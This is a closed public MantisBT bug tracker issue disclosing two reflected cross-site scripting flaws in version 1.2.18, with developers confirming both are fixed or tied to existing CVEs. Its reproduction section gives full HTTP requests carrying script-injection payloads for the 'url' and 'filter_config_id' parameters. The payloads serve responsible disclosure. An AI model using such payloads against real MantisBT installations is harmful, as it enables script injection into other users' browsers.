View Issue Details

IDProjectCategoryView StatusLast Update
0019384mantisbtsecuritypublic2015-03-25 17:50
ReporterTWSpiders Assigned Toatrol  
PrioritynormalSeverityminorReproducibilityalways
Status closedResolutionno change required 
Product Version1.2.18 
Summary0019384: Multiple Cross-Site Scripting Vulnerabilities
Description

Finding 1: Cross-Site Scripting Vulnerability in 'permalink_page.php' page

The /permalink_page.php page 'url' parameter in MantisBT is vulnerable to a cross-site scripting vulnerability when Javascript is supplied via GET or POST request.
The exploitation example below uses the "alert()" JavaScript function to display "XSS" word.

Finding 2: Cross-Site Scripting Vulnerability in 'adm_config_report.php' page

The /adm_config_report.php page 'filter_config_id' parameter in MantisBT is vulnerable to a cross-site scripting vulnerability when Javascript is supplied via GET or POST request.
The exploitation example below uses the "alert()" JavaScript function to display "XSS" word.

Steps To Reproduce

Finding 1: Cross-Site Scripting Vulnerability in 'permalink_page.php' page

#Request:
GET /mantisbt/permalink_page.php?url=javascript:alert("XSS")// HTTP/1.1
Host: a.b.c.d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=v7ca97s16ee4o7p3a7esqne0t0; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=b8f1c62e064b83ba98bdb851209e58869db6d583519ec51485107cc05f718602; MANTIS_MANAGE_USERS_COOKIE=0%3Adate_created%3AASC%3A0
Connection: keep-alive

Finding 2: Cross-Site Scripting Vulnerability in 'adm_config_report.php' page

#Request:
POST /mantisbt/adm_config_report.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=r6nvbc7i6jsanrm8iuk063hm54; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=b8f1c62e064b83ba98bdb851209e58869db6d583519ec51485107cc05f718602
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Referer: http://a.b.c.d/mantisbt/adm_config_report.php
Host: a.b.c.d
Content-Length: 147

save=1&filter_user_id=0&filter_project_id=0&filter_config_id=view_handler_threshold'/><script>alert("XSS")</script>&apply_filter_button=Apply+Filter

It’s possible to inject 'view_handler_threshold'/><script>alert("XSS")</script>' into parameter 'filter_config_id's value, which will be executed when the page loads in the user's browser.

TagsNo tags attached.
Attached Files
mantisBT_XSS.png (76,038 bytes)   
mantisBT_XSS.png (76,038 bytes)   

Relationships

related to 0011260 closeddhx Attribute/XSS injection in permalink_page.php 
related to 0019301 closeddregad CVE-2015-2046 : XSS in adm_config_report.php (FG-VD-15-008) 
related to 0017648 closeddregad CVE-2014-6316: URL redirection issue 
related to 0019493 closeddregad CVE-2014-9701: XSS vulnerability in permalink_page.php 

Activities

atrol

atrol

2015-02-20 02:24

developer   ~0048879

Finding 2: Cross-Site Scripting Vulnerability in 'adm_config_report.php' page
TWSpiders, could you please test if this is fixed in latest code, see 0019301

atrol

atrol

2015-02-22 06:51

developer   ~0048885

Finding 1: Cross-Site Scripting Vulnerability in 'permalink_page.php' page
Not reproducible in 1.2.19 and master, you get a link to index.php caused by changes to fix 0017648

atrol

atrol

2015-02-22 06:54

developer   ~0048886

Last edited: 2015-03-10 16:14

TWSpiders, do you agree that we can close the issue as your Finding 1 is fixed in latest stable version 1.2.19 (fixed since 1.2.18) and your Finding 2 is fixed in nightly builds of stable branch and will be fixed in next stable 1.2.20?

TWSpiders

TWSpiders

2015-02-26 17:07

reporter   ~0048905

Thanks. Yes, please close the ticket.

TWSpiders

TWSpiders

2015-03-03 15:31

reporter   ~0049134

Can you advise if you will be requesting a CVE for these findings?

dregad

dregad

2015-03-04 02:23

developer   ~0049135

@TWSpiders you will find the CVE numbers in the related (duplicate) issues, see the Relationships section above.

TWSpiders

TWSpiders

2015-03-09 15:46

reporter   ~0049156

Can you point me to the CVE for finding 1? I do not see a CVE requested for this finding. Thanks!

atrol

atrol

2015-03-10 16:24

developer   ~0049164

TWSpiders, is there a special reason that you post private notes?
If not, I will set them to public.

Your finding 1 has been resolved in version 1.2.18 since fix of bug 0017648, CVE-2014-6316

If you want to have an own CVE for it , you can open a new issue for version 1.2.17, set it to resolved in version 1.2.18 and request a new CVE.

For future reports: Please do not report more than one finding in one issue as it makes it hard to follow up and impossible to assign 1:1 CVE's to issue ID's.